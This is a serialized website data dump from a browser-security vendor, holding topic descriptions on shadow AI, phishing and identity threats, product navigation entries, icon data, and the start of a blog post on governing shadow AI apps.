teams.",74,{"sys":576,"faqItemsCollection":578,"name":580,"slug":581,"tier":45,"intro":582,"faqTitle":59,"postCount":583,"hasPage":19},{"id":577},"topic-shadow-ai",{"items":579},[],"Shadow AI","shadow-ai","Shadow AI is employees’ unsanctioned use of AI tools at work, putting corporate data into chatbots and assistants that security teams never approved and can’t see. Push’s own browser telemetry shows AI adoption acting as a force multiplier for shadow IT — potentially now outscaling shadow SaaS — and this hub tracks that research, real-world breach examples, and practical controls.",20,{"sys":585,"faqItemsCollection":587,"name":589,"slug":590,"tier":45,"intro":591,"faqTitle":59,"postCount":592,"hasPage":19},{"id":586},"topic-shadow-saas",{"items":588},[],"Shadow SaaS","shadow-saas","Shadow SaaS is the cloud applications employees adopt for work without IT approval, each one creating unmanaged accounts, identities, and data outside your security controls. Push covers the problem end to end — from browser-based SaaS discovery to in-browser app banners and MFA enforcement — alongside breach analyses that show where unmanaged accounts lead.",75,{"sys":594,"faqItemsCollection":596,"name":598,"slug":599,"tier":45,"intro":600,"faqTitle":59,"postCount":601,"hasPage":19},{"id":595},"topic-siem",{"items":597},[],"SIEM","siem","A SIEM is only as good as the telemetry feeding it, and most log sources never see what happens inside the browser — where phishing, session token theft, and account takeover actually play out. Push streams browser-level detections and identity telemetry into SIEMs, and these posts show how that data improves detection fidelity and cuts alert fatigue.",19,{"sys":603,"faqItemsCollection":605,"name":607,"slug":608,"tier":45,"intro":609,"faqTitle":59,"postCount":610,"hasPage":19},{"id":604},"topic-social-engineering",{"items":606},[],"Social engineering","social-engineering","Social engineering is the manipulation of people — through phishing pages, help desk impersonation, vishing calls, and poisoned tenant invites — into handing over access that no exploit could take. Coverage here tracks how threat actors run these plays — drawing on Push’s ongoing investigation of live phishing infrastructure and criminal tooling.",59,{"sys":612,"faqItemsCollection":614,"name":616,"slug":617,"tier":31,"intro":618,"faqTitle":59,"postCount":557,"hasPage":6},{"id":613},"topic-supply-chain-security",{"items":615},[],"Supply chain security","supply-chain-security","Supply chain security extends beyond your own perimeter to the vendors, platforms, and browser extensions your organization depends on. A compromised third party can hand attackers legitimate access — as recent campaigns against SaaS providers have shown. Push’s research examines the browser-extension supply chain in particular: why extension risk scores fail to predict compromise, and how developers can harden extensions against takeover. These posts frame supply chain risk through a browser and identity lens.",{"sys":620,"faqItemsCollection":622,"name":624,"slug":625,"tier":45,"intro":626,"faqTitle":59,"postCount":627,"hasPage":19},{"id":621},"topic-swg",{"items":623},[],"SWG","swg","A secure web gateway (SWG) filters and inspects web traffic in transit, sitting in the network path between users and the internet. That position shows you the packet but not the session: Push’s research on AitM phishing kits documents how attackers break the signatures proxies rely on, and these posts explain why phishing detection is moving from the network path into the browser itself.",17,{"sys":629,"faqItemsCollection":631,"name":633,"slug":634,"tier":45,"intro":635,"faqTitle":59,"postCount":636,"hasPage":19},{"id":630},"topic-third-party-risk",{"items":632},[],"Third-party risk","third-party-risk","Third-party risk is the exposure your organization inherits from vendors, SaaS providers, and integrations that hold your data or access your tenants — a chain now extended one employee sign-up at a time. This hub collects Push’s breach analyses and guides for assessing OAuth integrations, managing browser extensions, and responding when a supplier is compromised.",44,{"sys":638,"faqItemsCollection":640,"name":642,"slug":643,"tier":31,"intro":644,"faqTitle":59,"postCount":398,"hasPage":19},{"id":639},"topic-threat-landscape",{"items":641},[],"Threat landscape","threat-landscape","The enterprise threat landscape is now defined by identity attacks: criminals log in with phished, stolen, or stuffed credentials rather than breaking infrastructure. Threat actors keep proving how effective help desk scams, MFA bypass, and session theft are against well-defended organizations. Drawing on breach analyses, annual phishing trend reviews, and in-the-wild campaign tracking, Push documents how attacker TTPs are shifting. This hub is where to follow those changes.",{"sys":646,"faqItemsCollection":648,"name":650,"slug":651,"tier":45,"intro":652,"faqTitle":59,"postCount":371,"hasPage":19},{"id":647},"topic-vishing",{"items":649},[],"Vishing","vishing","Vishing — voice phishing — uses phone calls to impersonate IT support, help desks, or employees, talking targets into password resets, MFA approvals, or opening attacker-controlled pages. Threat actors now routinely pair calls with AiTM phishing to hijack SSO accounts, a chain Push has analyzed across campaigns targeting hundreds of organizations.",{},"blogtopics","w0ITersBlkytyrxHNkTEFmGsSW5X9NfdbmeXV1u8bAo",[657,661,665,669,673],{"title":658,"logo":659,"createdDate":660},"SOC2","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6727a5e00004d6e9e69fc3068b8b64c",1784291539953,{"title":662,"logo":663,"createdDate":664},"GDPR","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ffe49f53211674deaa5a6640d929cdf42?format=webp",1784291672535,{"title":666,"logo":667,"createdDate":668},"Cyber essentials","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F53558c1045a342a7a28def960cd54ae7?format=webp",1784291702710,{"title":670,"logo":671,"createdDate":672},"ISO IEC 27001","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F578a404a61cf45db951a41fe3554d12d",1784291766222,{"title":674,"logo":675,"createdDate":676},"ISO IEC 27701","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbe219844b13242fbba531959579a753c",1784291858848,[678,730,775],{"id":679,"label":680,"text":21,"navIcon":681,"items":682},"stop-browser-based-attacks","Stop browser-based attacks","solid:faShieldHalved",[683,688,693,698,703,708,712,717,721,725],{"title":684,"text":685,"url":686,"navIcon":687},"Adversary-in-the-Middle","Detect and block AiTM proxies stealing session tokens.","/solution/stop-browser-based-attacks/adversary-in-the-middle-attacks","solid:faUserSecret",{"title":689,"text":690,"url":691,"navIcon":692},"ClickFix (+Fix variants)","Block attacks that trick users into running malicious code.","/solution/stop-browser-based-attacks/clickfix-fix-variants","sharp-regular:faLaptopCode",{"title":694,"text":695,"url":696,"navIcon":697},"Malicious OAuth integrations","Detect suspicious OAuth consent flows and stop persistent access.","/solution/stop-browser-based-attacks/malicious-oauth-integrations","solid:faPlugCircleXmark",{"title":699,"text":700,"url":701,"navIcon":702},"Malicious browser extensions","Shine a light on risky browser extensions.","/solution/stop-browser-based-attacks/malicious-browser-extensions","sharp-regular:faPuzzlePiece",{"title":704,"text":705,"url":706,"navIcon":707},"Malicious file downloads","Gain visibility into browser downloads and block malicious files.","/solution/stop-browser-based-attacks/malicious-file-downloads","solid:faFileCircleXmark",{"title":395,"text":709,"url":710,"navIcon":711},"Surface hidden login paths that bypass SSO and expose accounts.","/solution/stop-browser-based-attacks/ghost-logins","solid:faGhost",{"title":713,"text":714,"url":715,"navIcon":716},"Mobile phishing (QR & SMS)","Detect phishing links delivered via SMS and QR codes.","/solution/stop-browser-based-attacks/mobile-phishing-qr-code-sms","solid:faQrcode",{"title":333,"text":718,"url":719,"navIcon":720},"Identify reused and compromised credentials across SaaS logins.","/solution/stop-browser-based-attacks/credential-stuffing","custom:credentialStuffing",{"title":571,"text":722,"url":723,"navIcon":724},"Detect and block stolen session tokens before attackers get access.","/solution/stop-browser-based-attacks/session-hijacking","solid:faCookieBite",{"title":726,"text":727,"url":728,"navIcon":729},"Zero-day phishing","Detect phishing TTPs directly in the browser and stop credential theft.","/solution/stop-browser-based-attacks/zero-day-phishing","sharp-regular:faFishingRod",{"id":731,"label":732,"text":21,"navIcon":733,"items":734},"achieve-security-outcomes","Achieve security outcomes","solid:faCheckToSlot",[735,740,745,750,755,760,765,770],{"title":736,"text":737,"url":738,"navIcon":739},"Stop account takeover","Stop ATO with stolen credential and compromised token detection.","/solution/achieve-security-outcomes/stop-account-takeover","sharp-regular:faUserSecret",{"title":741,"text":742,"url":743,"navIcon":744},"Harden unmanaged identities","Harden access paths with visibility, detection, and guardrails.","/solution/achieve-security-outcomes/harden-unmanaged-identities","sharp-regular:faRadar",{"title":746,"text":747,"url":748,"navIcon":749},"Investigate browser-related incidents","Investigate and respond faster with unique browser telemetry.","/solution/achieve-security-outcomes/investigate-browser-related-incidents","sharp-regular:faSatelliteDish",{"title":751,"text":752,"url":753,"navIcon":754},"Secure shadow SaaS","See and control shadow SaaS in the browser.","/solution/achieve-security-outcomes/secure-shadow-saas","sharp-regular:faShieldCheck",{"title":756,"text":757,"url":758,"navIcon":759},"Secure AI","See and control AI apps in the browser.","/solution/achieve-security-outcomes/secure-ai","sharp-regular:faBrainCircuit",{"title":761,"text":762,"url":763,"navIcon":764},"Secure BYOD","Extend consistent browser-based protection to unmanaged devices.","/solution/achieve-security-outcomes/secure-bring-your-own-device","solid:faMobileScreenButton",{"title":766,"text":767,"url":768,"navIcon":769},"Secure Chromebooks","Secure browser activity on Chromebooks without endpoint agents.","/solution/achieve-security-outcomes/secure-chromebooks","brands:faChrome",{"title":771,"text":772,"url":773,"navIcon":774},"Investigate and stop data loss","Detect and prevent data loss across AI tools, apps, and sessions.","/solution/achieve-security-outcomes/investigate-and-stop-data-loss","custom:investigateAndStopDataLoss",{"id":776,"label":777,"text":21,"navIcon":778,"items":779},"tool-replacements","Tool replacements","solid:faScrewdriverWrench",[780,785,790,795],{"title":781,"text":782,"url":783,"navIcon":784},"Remote browser isolation","Detect attacks that look like normal browsing.","/solution/tool-replacements/remote-browser-isolation","solid:faDisplay",{"title":786,"text":787,"url":788,"navIcon":789},"Secure web gateways","Detect attacks inside the browser after SWGs allowed the connection.","/solution/tool-replacements/secure-web-gateways","solid:faFilter",{"title":791,"text":792,"url":793,"navIcon":794},"Cloud access security broker","Catch browser-based identity threats in real time, not after the fact.","/solution/tool-replacements/cloud-access-security-broker","solid:faCloudArrowUp",{"title":796,"text":797,"url":798,"navIcon":799},"Security awareness training","Block real phishing instead of training users on simulations.","/solution/tool-replacements/security-awareness-training","custom:securityAwareness",{"w":801,"h":802,"d":803},448,512,"M171-16c-36.4 0-57.8 58.3-68.3 112L72 96c-13.3 0-24 10.7-24 24s10.7 24 24 24l24 0 0 32c0 17 3.3 33.2 9.3 48l-9.3 0 0 0-20.5 0c-15.2 0-27.5 12.3-27.5 27.5 0 3 .5 5.9 1.4 8.7l28.9 86.6C40.2 379.6 16 428.1 16 482.3 16 498.7 29.3 512 45.7 512l356.6 0c16.4 0 29.7-13.3 29.7-29.7 0-54.2-24.2-102.7-62.3-135.4l28.9-86.6c.9-2.8 1.4-5.7 1.4-8.7 0-15.2-12.3-27.5-27.5-27.5l-20.5 0 0 0-9.3 0c6-14.8 9.3-31 9.3-48l0-32 24 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-30.7 0c-10.4-53.7-31.9-112-68.3-112-9.6 0-19 3.9-27.5 8.2-8.2 4.1-18.4 7.8-25.5 7.8s-17.3-3.7-25.5-7.8C190-12.1 180.6-16 171-16zm93.7 484.4l-24.8-70.9 27.9-32.5c2.7-3.2 4.2-7.2 4.2-11.4 0-9.7-7.8-17.5-17.5-17.5l-61 0c-9.7 0-17.5 7.8-17.5 17.5 0 4.2 1.5 8.2 4.2 11.4l27.9 32.5-24.8 70.9-57-180.4 35.7 0c18.4 10.2 39.5 16 62 16s43.6-5.8 62-16l35.7 0-57 180.4zM224 256c-34.7 0-64.2-22.1-75.3-53 5.7 3.2 12.3 5 19.3 5l12.4 0c16.5 0 31.1-10.6 36.3-26.2 2.3-7 12.2-7 14.5 0 5.2 15.6 19.9 26.2 36.3 26.2l12.4 0c7 0 13.6-1.8 19.3-5-11.1 30.9-40.6 53-75.3 53z",{"w":17,"h":802,"d":805},"M112 80l416 0 0 224 48 0 0-272-512 0 0 272 48 0 0-224zM48 404.1l0-4.1 544 0 0 4.1-27.9 27.9-488.2 0-27.9-27.9zM592 352l-592 0 0 72 56 56 528 0 56-56 0-72-48 0zM281 169l17-17-33.9-33.9c-6.1 6.1-27.8 27.8-65 65l-17 17c6.1 6.1 27.8 27.8 65 65l17 17 33.9-33.9c-9-9-25-25-48-48l31-31zM393 135l-17-17-33.9 33.9c9 9 25 25 48 48-23 23-39 39-48 48L376 281.9c6.1-6.1 27.8-27.8 65-65l17-17c-6.1-6.1-27.8-27.8-65-65z",{"w":17,"h":802,"d":807},"M192-32c17.7 0 32 14.3 32 32l0 96 128 0 0-96c0-17.7 14.3-32 32-32s32 14.3 32 32l0 96 64 0c17.7 0 32 14.3 32 32s-14.3 32-32 32l0 48.7c-98.6 8.1-176 90.7-176 191.3 0 27.3 5.7 53.3 16 76.9l0 3.1c0 17.7-14.3 32-32 32s-32-14.3-32-32l0-66.7C165.2 398.1 96 319.1 96 224l0-64c-17.7 0-32-14.3-32-32S78.3 96 96 96l64 0 0-96c0-17.7 14.3-32 32-32zM496 256a144 144 0 1 1 0 288 144 144 0 1 1 0-288zm59.3 107.3c6.2-6.2 6.2-16.4 0-22.6s-16.4-6.2-22.6 0l-36.7 36.7-36.7-36.7c-6.2-6.2-16.4-6.2-22.6 0s-6.2 16.4 0 22.6l36.7 36.7-36.7 36.7c-6.2 6.2-6.2 16.4 0 22.6s16.4 6.2 22.6 0l36.7-36.7 36.7 36.7c6.2 6.2 16.4 6.2 22.6 0s6.2-16.4 0-22.6l-36.7-36.7 36.7-36.7z",{"w":802,"h":802,"d":809},"M201.1 57.3c-7 5.3-9.1 10.7-9.1 14.7 0 4.5 2.8 11.2 12.4 16.9l11.6 7 0 48.1-168 0 0 60.5c7.4-2.9 15.5-4.5 24-4.5 43.1 0 72 39.4 72 80s-28.9 80-72 80c-8.5 0-16.6-1.6-24-4.5l0 108.5 108.5 0c-2.9-7.4-4.5-15.5-4.5-24 0-43.1 39.4-72 80-72s80 28.9 80 72c0 8.5-1.6 16.6-4.5 24l60.5 0 0-168 48.1 0 7 11.6c5.8 9.6 12.4 12.4 16.9 12.4 4 0 9.5-2.1 14.7-9.1s9.3-17.9 9.3-30.9-4-23.8-9.3-30.9-10.7-9.1-14.7-9.1c-4.5 0-11.2 2.8-16.9 12.4l-7 11.6-48.1 0 0-120-120 0 0-48.1 11.6-7c9.6-5.8 12.4-12.4 12.4-16.9 0-4-2.1-9.5-9.1-14.7S245 48 232 48 208.2 52 201.1 57.3zM172.3 18.9C188.5 6.8 209.6 0 232 0S275.5 6.8 291.7 18.9 320 49.5 320 72c0 8.6-1.8 16.7-4.9 24l100.9 0 0 100.9c7.3-3.1 15.4-4.9 24-4.9 22.5 0 41 12.2 53.1 28.3s18.9 37.3 18.9 59.7-6.8 43.5-18.9 59.7-30.6 28.3-53.1 28.3c-8.6 0-16.7-1.8-24-4.9l0 148.9-168 0 0-49.3 8.2-7.2c5.4-4.7 7.8-10.3 7.8-15.5 0-9.9-10.7-24-32-24s-32 14.1-32 24c0 5.3 2.4 10.8 7.8 15.5l8.2 7.2 0 49.3-216 0 0-216 49.3 0 7.2 8.2c4.7 5.4 10.3 7.8 15.5 7.8 9.9 0 24-10.7 24-32s-14.1-32-24-32c-5.3 0-10.8 2.4-15.5 7.8L49.3 264 0 264 0 96 148.9 96c-3.1-7.3-4.9-15.4-4.9-24 0-22.5 12.2-41 28.3-53.1z",{"w":811,"h":802,"d":812},576,"M96 0C60.7 0 32 28.7 32 64l0 384c0 35.3 28.7 64 64 64l180 0c-22.7-31.5-36-70.2-36-112 0-100.6 77.4-183.2 176-191.3l0-38.1c0-17-6.7-33.3-18.7-45.3L290.7 18.7C278.7 6.7 262.5 0 245.5 0L96 0zM357.5 176L264 176c-13.3 0-24-10.7-24-24L240 58.5 357.5 176zM432 544a144 144 0 1 0 0-288 144 144 0 1 0 0 288zm59.3-180.7l-36.7 36.7 36.7 36.7c6.2 6.2 6.2 16.4 0 22.6s-16.4 6.2-22.6 0l-36.7-36.7-36.7 36.7c-6.2 6.2-16.4 6.2-22.6 0s-6.2-16.4 0-22.6l36.7-36.7-36.7-36.7c-6.2-6.2-6.2-16.4 0-22.6s16.4-6.2 22.6 0l36.7 36.7 36.7-36.7c6.2-6.2 16.4-6.2 22.6 0s6.2 16.4 0 22.6z",{"w":814,"h":802,"d":815},384,"M40.1 467.1l-11.2 9C25.7 478.6 21.8 480 17.8 480 8 480 0 472 0 462.2L0 192C0 86 86 0 192 0S384 86 384 192l0 270.2c0 9.8-8 17.8-17.8 17.8-4 0-7.9-1.4-11.1-3.9l-11.2-9c-13.4-10.7-32.8-9-44.1 3.9L269.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6l-26.6-30.5c-12.7-14.6-35.4-14.6-48.2 0L141.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6L84.2 471c-11.3-12.9-30.7-14.6-44.1-3.9zM160 192a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zm96 32a32 32 0 1 0 0-64 32 32 0 1 0 0 64z",{"w":801,"h":802,"d":817},"M64 160l64 0 0-64-64 0 0 64zM0 80C0 53.5 21.5 32 48 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48L0 80zM64 416l64 0 0-64-64 0 0 64zM0 336c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96zM320 96l0 64 64 0 0-64-64 0zM304 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96c0-26.5 21.5-48 48-48zM288 352a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm0 64c17.7 0 32 14.3 32 32s-14.3 32-32 32-32-14.3-32-32 14.3-32 32-32zm96 32c0-17.7 14.3-32 32-32s32 14.3 32 32-14.3 32-32 32-32-14.3-32-32zm32-96a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm-32 32a32 32 0 1 1 -64 0 32 32 0 1 1 64 0z",{"w":802,"h":802,"d":819},"M257.5 27.6c-.8-5.4-4.9-9.8-10.3-10.6-22.1-3.1-44.6 .9-64.4 11.4l-74 39.5C89.1 78.4 73.2 94.9 63.4 115L26.7 190.6c-9.8 20.1-13 42.9-9.1 64.9l14.5 82.8c3.9 22.1 14.6 42.3 30.7 57.9l60.3 58.4c16.1 15.6 36.6 25.6 58.7 28.7l83 11.7c22.1 3.1 44.6-.9 64.4-11.4l74-39.5c19.7-10.5 35.6-27 45.4-47.2l36.7-75.5c9.8-20.1 13-42.9 9.1-64.9-.9-5.3-5.3-9.3-10.6-10.1-51.5-8.2-92.8-47.1-104.5-97.4-1.8-7.6-8-13.4-15.7-14.6-54.6-8.7-97.7-52-106.2-106.8zM208 144a32 32 0 1 1 0 64 32 32 0 1 1 0-64zM144 336a32 32 0 1 1 64 0 32 32 0 1 1 -64 0zm224-64a32 32 0 1 1 0 64 32 32 0 1 1 0-64z",{"w":801,"h":802,"d":821},"M284.6 0l91.4 0 0 160-48 0 0-112-36.6 0-203.4 58.1 0 181.9 40 0 0 224-128 0 0-224 40 0 0-218.1 17.4-5 224-64 3.2-.9zM80 336l-32 0 0 128 32 0 0-128zm176 8c0-76.8 64-136 96-152 32 16 96 75.2 96 152 0 32-16 80-64 112l32 40 0 16-128 0 0-16 32-40c-48-32-64-80-64-112zm128-32a24 24 0 1 0 -48 0 24 24 0 1 0 48 0z",{"w":801,"h":802,"d":823},"M144-16l-48 112-48 0 0 48 48 0 0 32c0 17 3.3 33.2 9.3 48l-73.3 0 0 32 5.3 16 26.7 80-64 160 51.7 0 56.9-142.2 6.5-16.3c-1-3.1-10.1-30.3-27.2-81.5l51.4 0c22.6 19.9 52.2 32 84.7 32s62.1-12.1 84.7-32l51.4 0c-17.1 51.2-26.1 78.4-27.2 81.5l6.5 16.3 56.9 142.2 51.7 0-64-160 26.7-80 5.3-16 0-32-73.3 0c6-14.8 9.3-31 9.3-48l0-32 48 0 0-48-48 0-48-112-32 0-48 32-48-32-32 0zm80 272c-32.8 0-61-19.7-73.3-48l57.3 0 16-40 16 40 57.3 0c-12.3 28.3-40.5 48-73.3 48zm17.5 139.6l30.5-35.6 0-24-96 0 0 24 30.5 35.6-46.5 116.4 128 0-46.5-116.4z",{"w":802,"h":802,"d":825},"M497.4 49l17-17-33.9-33.9C473.6 4.9 453.3 25.2 419.7 58.8 375.4 22.1 318.5 0 256.4 0 115.1 0 .4 114.6 .4 256s114.6 256 256 256 256-114.6 256-256l-48 0c0 114.9-93.1 208-208 208s-208-93.1-208-208 93.1-208 208-208c48.8 0 93.7 16.8 129.1 44.9l-45.7 45.7c-23.5-16.8-52.3-26.6-83.4-26.6-79.5 0-144 64.5-144 144s64.5 144 144 144 144-64.5 144-144l-48 0c0 53-43 96-96 96s-96-43-96-96 43-96 96-96c17.8 0 34.5 4.8 48.8 13.3-52 52-79.5 79.5-82.7 82.7l33.9 33.9 17-17 224-224z",{"w":802,"h":802,"d":827},"M208 0l24 0C386.6 0 512 125.4 512 280l0 24-48 0 0-24C464 151.9 360.1 48 232 48l-24 0 0-48zm24 96c101.6 0 184 82.4 184 184l0 24-48 0 0-24c0-75.1-60.9-136-136-136l-24 0 0-48 24 0zM48 256c0 114.9 93.1 208 208 208 22.9 0 45-3.7 65.6-10.5l-263-263C51.7 211 48 233.1 48 256zM0 256c0-36.5 7.6-71.3 21.4-102.7 6.7-15.3 14.9-29.9 24.4-43.5 7.7 7.7 61.5 61.5 161.2 161.2 30.5-30.5 49.5-49.5 57-57L297.9 248c-7.5 7.5-26.5 26.5-57 57 99.7 99.7 153.5 153.5 161.2 161.2-13.6 9.5-28.2 17.7-43.5 24.4-31.4 13.8-66.2 21.4-102.7 21.4-141.4 0-256-114.6-256-256z",{"w":802,"h":802,"d":829},"M267.6 4.5l207.5 80.5 19.2 7.4 1.2 20.5c2.9 50-4.9 126.3-37.3 200.9-32.7 75.2-91.1 150-189.4 192.5l-12.7 5.5-12.7-5.5C144.9 463.9 86.6 389.2 53.9 313.9 21.5 239.3 13.7 162.9 16.6 113L17.8 92.5 37 85 244.5 4.5 256 0 267.6 4.5zM64.1 126C63.1 169.5 71 232.9 97.9 294.8 126.1 359.7 175 422.4 256 459.6 337.1 422.4 385.9 359.7 414.2 294.8 441 232.9 449 169.5 448 126L256 51.5 64.1 126zm302.3 44.7L352.3 190.1 249.8 330.9 233 354c-8.8-9.1-30.9-32-66.2-68.6l-16.7-17.3 34.5-33.3c9.5 9.8 23.9 24.7 43.2 44.7l85.6-117.7 14.1-19.4 38.8 28.2z",{"w":802,"h":802,"d":831},"M192 48l40 0 0 108-12.4 0c-7.6-16.5-24.3-28-43.6-28-26.5 0-48 21.5-48 48s21.5 48 48 48c19.4 0 36.1-11.5 43.6-28l12.4 0 0 56-92 0 0 56.4c-16.5 7.6-28 24.3-28 43.6 0 26.5 21.5 48 48 48s48-21.5 48-48c0-19.4-11.5-36.1-28-43.6l0-16.4 52 0 0 172-40 0c-16.8 0-31.2-10.3-37.1-25.1l-6.4-16-17.2 1c-1.1 .1-2.2 .1-3.2 .1-30.9 0-56-25.1-56-56 0-9.5 2.4-18.5 6.5-26.3l8.7-16.2-13.4-12.6c-11-10.2-17.8-24.8-17.8-40.9 0-21.6 12.2-40.4 30.3-49.8l22.6-11.7-13.1-21.9c-5-8.4-7.9-18.1-7.9-28.6 0-30.9 25.1-56 56-56l24 0 0-32c0-13.3 10.7-24 24-24zm88 148l12.4 0c7.6 16.5 24.3 28 43.6 28 26.5 0 48-21.5 48-48s-21.5-48-48-48c-19.4 0-36.1 11.5-43.6 28l-12.4 0 0-108 40 0c13.3 0 24 10.7 24 24l0 32 24 0c30.9 0 56 25.1 56 56 0 10.5-2.9 20.3-7.9 28.6l-13.1 21.9 22.6 11.7c18 9.3 30.3 28.1 30.3 49.8 0 16.1-6.8 30.7-17.8 40.9l-13.4 12.6 8.7 16.2c4.2 7.8 6.5 16.7 6.5 26.3 0 30.9-25.1 56-56 56-1.1 0-2.2 0-3.2-.1l-17.2-1-6.4 16C351.2 453.7 336.8 464 320 464l-40 0 0-76 92 0 0-56.4c16.5-7.6 28-24.3 28-43.6 0-26.5-21.5-48-48-48s-48 21.5-48 48c0 19.4 11.5 36.1 28 43.6l0 16.4-52 0 0-152zM192 512l128 0c31.1 0 58.4-16.2 74.1-40.5 52.7-5.1 93.9-49.5 93.9-103.5 0-11.5-1.9-22.5-5.3-32.9 13.4-17.5 21.3-39.4 21.3-63.1 0-32-14.5-60.6-37.1-79.7 3.3-10.2 5.1-21.1 5.1-32.3 0-49.6-34.8-91.1-81.3-101.5-6.3-33.3-35.6-58.5-70.7-58.5L192 0c-35.1 0-64.4 25.2-70.7 58.5-46.5 10.4-81.3 51.9-81.3 101.5 0 11.3 1.8 22.2 5.1 32.3-22.7 19.1-37.1 47.7-37.1 79.7 0 23.7 8 45.6 21.3 63.1-3.5 10.4-5.3 21.4-5.3 32.9 0 54 41.2 98.5 93.9 103.5 15.6 24.3 42.9 40.5 74.1 40.5zM336 192a16 16 0 1 1 0-32 16 16 0 1 1 0 32zm32 96a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zM176 352a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zm16-176a16 16 0 1 1 -32 0 16 16 0 1 1 32 0z",{"w":814,"h":802,"d":833},"M16 64C16 28.7 44.7 0 80 0L304 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L80 512c-35.3 0-64-28.7-64-64L16 64zm64 0l0 304 224 0 0-304-224 0zM192 472c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32z",{"w":802,"h":802,"d":835},"M0 256c0-46.6 12.5-90.4 34.3-128.9L144.1 318.3c21.9 39.2 63.8 65.7 111.9 65.7 14.3 0 27.1-2.3 40.8-6.6L220.5 509.6C95.9 492.3 0 385.3 0 256zm365.1 65.6c12.3-19.2 18.9-42.5 18.9-65.6 0-38.2-16.8-72.5-43.3-96l152.7 0c12 29.6 18.6 62.1 18.6 96 0 141.4-114.6 255.1-256 256L365.1 321.6zM477.8 128L256 128c-62.9 0-113.7 44.1-125.5 102.7L54.2 98.5C101 38.5 174 0 256 0 350.8 0 433.5 51.5 477.8 128zM344 256a88 88 0 1 1 -176 0 88 88 0 1 1 176 0z",{"w":802,"h":802,"d":837},"M448 96l0 256-384 0 0-256 384 0zM64 32C28.7 32 0 60.7 0 96L0 352c0 35.3 28.7 64 64 64l144 0-16 48-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l272 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-72 0-16-48 144 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 32z",{"w":802,"h":802,"d":839},"M32 64C19.1 64 7.4 71.8 2.4 83.8S.2 109.5 9.4 118.6L192 301.3 192 416c0 8.5 3.4 16.6 9.4 22.6l64 64c9.2 9.2 22.9 11.9 34.9 6.9S320 492.9 320 480l0-178.7 182.6-182.6c9.2-9.2 11.9-22.9 6.9-34.9S492.9 64 480 64L32 64z",{"w":811,"h":802,"d":841},"M144 480c-79.5 0-144-64.5-144-144 0-63.4 41-117.2 97.9-136.5-1.3-7.7-1.9-15.5-1.9-23.5 0-79.5 64.5-144 144-144 55.4 0 103.5 31.3 127.6 77.1 14.2-8.3 30.8-13.1 48.4-13.1 53 0 96 43 96 96 0 15.7-3.8 30.6-10.5 43.7 44 20.3 74.5 64.7 74.5 116.3 0 70.7-57.3 128-128 128l-304 0zM305 191c-9.4-9.4-24.6-9.4-33.9 0l-72 72c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0l31-31 0 102.1c0 13.3 10.7 24 24 24s24-10.7 24-24l0-102.1 31 31c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-72-72z",[843,4943,8226,12740,18128,21345,24554,27297,29429,32370,34308,36380,38787,41027,43164,45924,47965,50701,52866,55579,57658,58528,61800,64699,67301,69649,74537,75957],{"id":844,"title":845,"authorsCollection":846,"content":854,"extension":228,"faqItemsCollection":1864,"faqTitle":2052,"featured":6,"hashTags":59,"meta":2053,"metaTitle":2054,"ogImage":59,"postType":59,"publishedDate":2055,"relatedBlogPostsCollection":2056,"slug":4882,"stem":4883,"subtitle":4884,"summary":4885,"synopsis":4895,"sys":4896,"tagsCollection":4899,"topicsCollection":4908,"__hash__":4942},"blog/blog/shadow-ai-how-to-discover-govern-and-secure-ai-apps.json","Shadow AI: how to discover, govern, and secure AI apps",{"items":847},[848],{"fullName":849,"firstName":850,"jobTitle":851,"socialLinks":59,"profilePicture":852},"Kelly Davenport","Kelly","Product Team",{"url":853},"https://images.ctfassets.net/y1cdw1ablpvd/1hi8bEuVfn5sF57LivAq6d/9a3b82426c697d765e2e450e33a18424/kelly_profile_pic.jpeg",{"json":855,"links":1710},{"nodeType":856,"data":857,"content":858},"document",{},[859,868,875,926,933,940,995,1004,1008,1017,1024,1036,1042,1054,1060,1072,1078,1081,1089,1096,1115,1126,1133,1140,1143,1151,1158,1183,1189,1196,1212,1228,1234,1250,1266,1273,1280,1287,1293,1296,1304,1311,1319,1326,1342,1349,1374,1380,1387,1393,1405,1412,1418,1424,1427,1435,1442,1461,1468,1476,1483,1495,1511,1517,1529,1563,1570,1586,1592,1608,1615,1622,1625,1633,1640,1647,1654,1661,1668,1675,1678,1685,1692],{"nodeType":860,"data":861,"content":862},"paragraph",{},[863],{"nodeType":864,"value":865,"marks":866,"data":867},"text","Every security team that's blocked an AI tool at the network level has had the same experience three months later: The tool they blocked isn't in use, but a dozen they've never heard of are.",[],{},{"nodeType":860,"data":869,"content":870},{},[871],{"nodeType":864,"value":872,"marks":873,"data":874},"The block didn't stop employees from using AI. It just prevented the security team from seeing what’s actually happening.",[],{},{"nodeType":860,"data":876,"content":877},{},[878,882,891,895,901,905,910,914,922],{"nodeType":864,"value":879,"marks":880,"data":881},"The data backs up this pattern. 